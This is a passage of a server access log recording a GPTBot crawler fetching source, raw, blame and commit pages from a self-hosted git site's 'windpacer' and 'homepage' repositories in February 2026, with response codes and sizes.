74.7.227.38] [Length 29829] [Gzip 12.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:14:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 29840] [Gzip 12.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:14:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/nginx.conf" [Client 74.7.227.38] [Length 772] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/nginx.conf" -[17/Feb/2026:13:14:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/database.sqlite" [Client 74.7.227.38] [Length 10829] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data" -[17/Feb/2026:13:14:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/.gitignore" [Client 74.7.227.38] [Length 500] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/.gitignore" -[17/Feb/2026:13:14:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/.gitignore" [Client 74.7.227.38] [Length 500] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/.gitignore" -[17/Feb/2026:13:14:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/.gitignore" [Client 74.7.227.38] [Length 11837] [Gzip 5.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/.gitignore" -[17/Feb/2026:13:14:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" [Client 74.7.227.38] [Length 9849] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" -[17/Feb/2026:13:14:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/.gitignore" [Client 74.7.227.38] [Length 11836] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/.gitignore" -[17/Feb/2026:13:14:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12785] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" -[17/Feb/2026:13:14:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/.gitignore" [Client 74.7.227.38] [Length 10136] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/.gitignore" -[17/Feb/2026:13:14:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/.gitignore" [Client 74.7.227.38] [Length 10136] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/.gitignore" -[17/Feb/2026:13:14:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/index.html" [Client 74.7.227.38] [Length 9854] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/index.html" -[17/Feb/2026:13:14:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11963] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" -[17/Feb/2026:13:14:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/README.md" [Client 74.7.227.38] [Length 11344] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" -[17/Feb/2026:13:14:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/types.ts" [Client 74.7.227.38] [Length 11522] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" -[17/Feb/2026:13:14:35 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" -[17/Feb/2026:13:14:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 11649] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" -[17/Feb/2026:13:14:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets" [Client 74.7.227.38] [Length 10362] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" -[17/Feb/2026:13:14:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" -[17/Feb/2026:13:14:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/App.tsx" -[17/Feb/2026:13:14:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12482] [Gzip 5.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/App.tsx" -[17/Feb/2026:13:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/index.html" [Client 74.7.227.38] [Length 2884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/index.html" -[17/Feb/2026:13:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/index.html" [Client 74.7.227.38] [Length 14358] [Gzip 4.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/index.html" -[17/Feb/2026:13:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/vite.config.ts" -[17/Feb/2026:13:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/vite.config.ts" -[17/Feb/2026:13:14:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/README.md" -[17/Feb/2026:13:14:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/types.ts" -[17/Feb/2026:13:14:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.tsx" -[17/Feb/2026:13:14:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.tsx" -[17/Feb/2026:13:14:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets" [Client 74.7.227.38] [Length 9856] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets" -[17/Feb/2026:13:14:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11238] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/vite.config.ts" -[17/Feb/2026:13:14:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services" -[17/Feb/2026:13:14:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/types.ts" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/types.ts" -[17/Feb/2026:13:14:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/index.html" [Client 74.7.227.38] [Length 9831] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/index.html" -[17/Feb/2026:13:14:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/index.html" [Client 74.7.227.38] [Length 13252] [Gzip 6.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/index.html" -[17/Feb/2026:13:14:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/index.html" [Client 74.7.227.38] [Length 2884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/index.html" -[17/Feb/2026:13:14:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/App.tsx" -[17/Feb/2026:13:14:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/README.md" [Client 74.7.227.38] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/README.md" -[17/Feb/2026:13:14:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html" [Client 74.7.227.38] [Length 14178] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" -[17/Feb/2026:13:14:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 11618] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.tsx" -[17/Feb/2026:13:14:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/README.md" [Client 74.7.227.38] [Length 10978] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/README.md" -[17/Feb/2026:13:14:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/database.sqlite" [Client 74.7.227.38] [Length 81765] [Gzip 50.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/database.sqlite" -[17/Feb/2026:13:14:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components" [Client 74.7.227.38] [Length 10604] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" -[17/Feb/2026:13:14:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/types.ts" [Client 74.7.227.38] [Length 11491] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/types.ts" -[17/Feb/2026:13:14:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/index.html" [Client 74.7.227.38] [Length 13281] [Gzip 6.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/index.html" -[17/Feb/2026:13:14:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 11496] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" -[17/Feb/2026:13:14:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/types.ts" [Client 74.7.227.38] [Length 10805] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/types.ts" -[17/Feb/2026:13:14:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 10390] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:13:14:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/README.md" [Client 74.7.227.38] [Length 11315] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/README.md" -[17/Feb/2026:13:14:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html" [Client 74.7.227.38] [Length 9827] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html" -[17/Feb/2026:13:14:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.tsx" -[17/Feb/2026:13:14:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 9845] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.tsx" -[17/Feb/2026:13:14:54 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html" -[17/Feb/2026:13:14:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components" -[17/Feb/2026:13:14:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/types.ts" -[17/Feb/2026:13:14:56 +0000] - 200 200 - GET https 